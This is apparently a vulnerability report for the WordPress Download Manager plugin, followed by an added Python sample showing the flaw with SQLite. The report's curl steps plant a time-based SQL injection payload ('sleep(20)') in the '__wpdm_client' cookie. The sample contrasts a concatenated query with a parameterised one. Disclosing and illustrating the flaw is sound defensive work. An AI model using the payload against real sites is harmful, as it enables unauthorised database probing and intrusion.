I would like to ask how to report a vulnerability in Download Manager.
I would also like to request a countermeasure for this issue.
Issue: A SQL injection attack on the cookie “__wpdm_client” will result in unintended behavior.
Operation:
STEP 1: Run the “curl” command as follows.
curl -i -c C:\Cookie\Cookie.txt http://[site address]/download/[File name]/?wpdmdl=[File number]
STEP 2: Open “C:\Cookie\Cookie.txt” and add the comments below, shown in red.
#HttpOnly_localhost FALSE /download/XXXX/ FALSE 0 __wpdm_client abcdefghijklmn’%2b(select*from(select(sleep(20)))a)%2b’
STEP 3: Run the “curl” command as follows.
curl -i -b C:\Cookie\Cookie.txt http://[site address]/download/[File name]/?wpdmdl=[File number]
STEP 4: To show the file, you have to wait 20 seconds.
I am looking forward to your feedback.
Best regards,
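
The behaviour reported above, as an added example (not part of the original post and not the plugin's code): a cookie value concatenated into a query runs the injected sub-select, while the same value passed as a bound parameter does not. The `sessions` table, the `probe()` function (a harmless counter standing in for `sleep(20)`), the cookie allowlist and the use of SQLite in place of the site's MySQL database are all assumptions.

```python
import re
import sqlite3

# Hypothetical allowlist: the real cookie format is not documented on the page.
CLIENT_ID_RE = re.compile(r"[A-Za-z0-9]{1,64}")

# Constructed sample with the same shape as the reported cookie value;
# probe() replaces sleep(20) so the side effect is a counter, not a delay.
TAMPERED = "abcdefghijklmn'+(select probe())+'"


def make_db():
    """Return (connection, calls); calls grows each time probe() runs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (client TEXT PRIMARY KEY, data TEXT)")
    db.execute("INSERT INTO sessions VALUES ('abcdefghijklmn', 'state-1')")
    calls = []
    db.create_function("probe", 0, lambda: calls.append(1) or 0)
    return db, calls


def lookup_concat(db, cookie):
    """Vulnerable pattern: the cookie text becomes part of the SQL statement."""
    sql = "SELECT data FROM sessions WHERE client = '" + cookie + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, cookie):
    """Hardened pattern: the cookie is passed as data, never parsed as SQL."""
    return db.execute(
        "SELECT data FROM sessions WHERE client = ?", (cookie,)
    ).fetchall()


def is_valid_client_id(cookie):
    """Defence in depth: reject values outside the expected alphabet."""
    return CLIENT_ID_RE.fullmatch(cookie) is not None


if __name__ == "__main__":
    db, calls = make_db()
    lookup_concat(db, TAMPERED)
    print("concatenated query ran injected sub-select:", len(calls) > 0)
    db, calls = make_db()
    lookup_bound(db, TAMPERED)
    print("bound query ran injected sub-select:", len(calls) > 0)
    print("allowlist accepts tampered value:", is_valid_client_id(TAMPERED))
```

In WordPress code the bound form corresponds to building the query with `$wpdb->prepare()` rather than string concatenation.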